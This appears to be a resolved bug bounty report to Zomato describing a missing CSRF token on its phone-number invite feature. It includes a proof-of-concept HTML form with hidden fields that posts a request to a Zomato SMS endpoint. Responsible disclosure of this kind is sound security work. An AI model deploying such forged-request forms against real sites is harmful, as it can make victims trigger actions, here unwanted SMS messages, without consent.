CSRF AT INVITING PEOPLE THOUGH PHONE NUMBER
Z
Zomato
Submitted None
Actions:
Reported by
kiraak-boy
Vulnerability Details
Technical details and impact analysis
Hello,
Please Add CSRF Token While Inviting The User Though Phone Number , You Have Good Rate Limit Protection But At The Same Time Add CSRF TOKEN :-
CODE :-
<html>
<body>
<form action="https://www.zomato.com/php/restaurantSmsHandler">
<input type="hidden" name="type" value="zomato-app-details" />
<input type="hidden" name="mobile_no" value="xxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Thanks!
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Violation of Secure Design Principles